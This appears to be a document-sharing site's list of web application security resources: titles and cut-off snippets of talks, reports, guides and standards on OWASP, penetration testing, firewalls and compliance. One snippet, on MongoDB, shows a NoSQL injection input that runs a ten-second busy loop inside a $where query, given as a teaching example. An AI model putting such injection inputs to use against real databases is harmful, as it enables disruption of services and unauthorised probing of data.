Conducting Web Application Pentests From Scoping to Report For Education Purposes Only Web App Pen Tests According to OWASP: A Web Application Penetration Test focuses only on evaluating the security of
More informationWebapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
More informationWeb Applica+on Security: Be Offensive! About Me
Web Applica+on Security: Be Offensive! Eric Johnson Cypress Data Defense 1 About Me Eric Johnson (Twi
More informationEssential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
More informationIntegrating Security Testing into Quality Control
Integrating Security Testing into Quality Control Executive Summary At a time when 82% of all application vulnerabilities are found in web applications 1, CIOs are looking for traditional and non-traditional
More informationNational Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research
National Information Security Group The Top Web Application Hack Attacks Danny Allan Director, Security Research 1 Agenda Web Application Security Background What are the Top 10 Web Application Attacks?
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
More informationSichere Software- Entwicklung für Java Entwickler
Sichere Software- Entwicklung für Java Entwickler Dominik Schadow Senior Consultant Trivadis GmbH 05/09/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART
More informationOWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741
OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741 ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN
More informationNuclear Regulatory Commission Computer Security Office Computer Security Standard
Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:
More informationArchitectural Design Patterns. Design and Use Cases for OWASP. Wei Zhang & Marco Morana OWASP Cincinnati, U.S.A. http://www.owasp.
Architectural Design Patterns for SSO (Single Sign On) Design and Use Cases for Financial i Web Applications Wei Zhang & Marco Morana OWASP Cincinnati, U.S.A. OWASP Copyright The OWASP Foundation Permission
More informationOWASP Application Security Building and Breaking Applications
OWASP Application Security Building and Breaking Applications Rochester OWASP Chapter - Durkee Consulting, Inc. info@rd1.net Who's? Principal Security Consultant Durkee Consulting Inc. Founder of Rochester
More informationCreating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
More informationWeb Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP rikjones@computer.org Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
More informationWeb Application Security Guidelines for Hosting Dynamic Websites on NIC Servers
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers The Website can be developed under Windows or Linux Platform. Windows Development should be use: ASP, ASP.NET 1.1/ 2.0, and
More informationSimon Fraser University. Web Security. Dr. Abhijit Sen CMPT 470
Web Security Dr. Abhijit Sen 95% of web apps have Vulnerabilities Cross-site scripting (80 per cent) SQL injection (62 per cent) Parameter tampering (60 per cent) http://www.vnunet.com/vnunet/news/2124247/web-applicationswide-open-hackers
More informationEVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
More informationState of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell
Stanford Computer Security Lab State of The Art: Automated Black Box Web Application Vulnerability Testing, Elie Bursztein, Divij Gupta, John Mitchell Background Web Application Vulnerability Protection
More informationFortiWeb Web Application Firewall. Ensuring Compliance for PCI DSS requirement 6.6 SOLUTION GUIDE
FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS requirement 6.6 SOLUTION GUIDE Overview Web applications and the elements surrounding them have not only become a key part of every company
More informationApplication Security Testing. Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il
Application Security Testing Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il Agenda The most common security vulnerabilities you should test for Understanding the problems
More informationThick Client Application Security
Thick Client Application Security Arindam Mandal (arindam.mandal@paladion.net) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
More informationColumbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
More informationAnnex B - Content Management System (CMS) Qualifying Procedure
Page 1 DEPARTMENT OF Version: 1.5 Effective: December 18, 2014 Annex B - Content Management System (CMS) Qualifying Procedure This document is an annex to the Government Web Hosting Service (GWHS) Memorandum
More informationCloud Security:Threats & Mitgations
Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer
More informationThe purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
More informationCTF Web Security Training. Engin Kirda ek@ccs.neu.edu
CTF Web Security Training Engin Kirda ek@ccs.neu.edu Web Security Why It is Important Easiest way to compromise hosts, networks and users Widely deployed ( payload No Logs! (POST Request Difficult to defend
More informationExcellence Doesn t Need a Certificate. Be an. Believe in You. 2014 AMIGOSEC Consulting Private Limited
Excellence Doesn t Need a Certificate Be an 2014 AMIGOSEC Consulting Private Limited Believe in You Introduction In this age of emerging technologies where IT plays a crucial role in enabling and running
More informationWeb Application Security
Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching
More informationImplementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
More informationUsing Free Tools To Test Web Application Security
Using Free Tools To Test Web Application Security Speaker Biography Matt Neely, CISSP, CTGA, GCIH, and GCWN Manager of the Profiling Team at SecureState Areas of expertise: wireless, penetration testing,
More informationJava Web Application Security
Java Web Application Security RJUG Nov 11, 2003 Durkee Consulting www.rd1.net 1 Ralph Durkee SANS Certified Mentor/Instructor SANS GIAC Network Security and Software Development Consulting Durkee Consulting
More informationSecuring Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group
Securing Your Web Application against security vulnerabilities Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group Agenda Security Landscape Vulnerability Analysis Automated Vulnerability
More informationPassing PCI Compliance How to Address the Application Security Mandates
Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These
More informationSichere Webanwendungen mit Java
Sichere Webanwendungen mit Java Karlsruher IT- Sicherheitsinitiative 16.07.2015 Dominik Schadow bridgingit Patch fast Unsafe platform unsafe web application Now lets have a look at the developers OWASP
More informationAdobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
More informationChapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
More informationRational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
More informationWith so many web applications, universities have a huge attack surface often without the IT security budgets or influence to back it up.
1 2 Why do we care about web application security? With so many web applications, universities have a huge attack surface often without the IT security budgets or influence to back it up. We constantly
More informationCyber Security Challenge Australia 2014
Cyber Security Challenge Australia 2014 www.cyberchallenge.com.au CySCA2014 Web Penetration Testing Writeup Background: Pentest the web server that is hosted in the environment at www.fortcerts.cysca Web
More informationOverview of the Penetration Test Implementation and Service. Peter Kanters
Penetration Test Service @ ABN AMRO Overview of the Penetration Test Implementation and Service. Peter Kanters ABN AMRO / ISO April 2010 Contents 1. Introduction. 2. The history of Penetration Testing
More informationWeb-Application Security
Web-Application Security Kristian Beilke Arbeitsgruppe Sichere Identität Fachbereich Mathematik und Informatik Freie Universität Berlin 29. Juni 2011 Overview Web Applications SQL Injection XSS Bad Practice
More informationHack Yourself First. Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com
Hack Yourself First Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com We re gonna turn you into lean, mean hacking machines! Because if we don t, these kids are going to hack you Jake Davies, 19 (and
More informationWhat about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)
Security What about MongoDB? Even though MongoDB doesn t use SQL, it can be vulnerable to injection attacks db.collection.find( {active: true, $where: function() { return obj.credits - obj.debits < req.body.input;
More informationFINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
More informationGuidelines for Web applications protection with dedicated Web Application Firewall
Guidelines for Web applications protection with dedicated Web Application Firewall Prepared by: dr inŝ. Mariusz Stawowski, CISSP Bartosz Kryński, Imperva Certified Security Engineer INTRODUCTION Security
More informationBarracuda Web Site Firewall Ensures PCI DSS Compliance
Barracuda Web Site Firewall Ensures PCI DSS Compliance E-commerce sales are estimated to reach $259.1 billion in 2007, up from the $219.9 billion earned in 2006, according to The State of Retailing Online
More informationApplication security testing: Protecting your application and data
E-Book Application security testing: Protecting your application and data Application security testing is critical in ensuring your data and application is safe from security attack. This ebook offers
More informationAPPLICATION SECURITY: FROM WEB TO MOBILE. DIFFERENT VECTORS AND NEW ATTACK
APPLICATION SECURITY: FROM WEB TO MOBILE. DIFFERENT VECTORS AND NEW ATTACK John T Lounsbury Vice President Professional Services, Asia Pacific INTEGRALIS Session ID: MBS-W01 Session Classification: Advanced
More informationWeb Application Attacks and Countermeasures: Case Studies from Financial Systems
Web Application Attacks and Countermeasures: Case Studies from Financial Systems Dr. Michael Liu, CISSP, Senior Application Security Consultant, HSBC Inc Overview Information Security Briefing Web Applications
More informationWeb Security Testing Cookbook*
Web Security Testing Cookbook* Systematic Techniques to Find Problems Fast Paco Hope and Ben Walther O'REILLY' Beijing Cambridge Farnham Koln Sebastopol Tokyo Table of Contents Foreword Preface xiii xv
More informationBASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS
BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS Published by Tony Porterfield Feb 1, 2015. Overview The intent of this test plan is to evaluate a baseline set of data security practices
More informationOut of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
More informationAuditing Web Applications
Auditing Web Applications IT Audit strategies for web applications August 2015 ISACA Geek Week Robert Morella MBA, CISA, CGEIT, CISSP Rob.morella@gmail.com 1 About Me Been there done that: IT Systems IT
More informationSQuAD: Application Security Testing
SQuAD: Application Security Testing Terry Morreale Ben Whaley June 8, 2010 Why talk about security? There has been exponential growth of networked digital systems in the past 15 years The great things
More informationSecure Programming Lecture 12: Web Application Security III
Secure Programming Lecture 12: Web Application Security III David Aspinall 6th March 2014 Outline Overview Recent failures More on authorization Redirects Sensitive data Cross-site Request Forgery (CSRF)
More informationETHICAL HACKING 010101010101APPLICATIO 00100101010WIRELESS110 00NETWORK1100011000 101001010101011APPLICATION0 1100011010MOBILE0001010 10101MOBILE0001
001011 1100010110 0010110001 010110001 0110001011000 011000101100 010101010101APPLICATIO 0 010WIRELESS110001 10100MOBILE00010100111010 0010NETW110001100001 10101APPLICATION00010 00100101010WIRELESS110
More information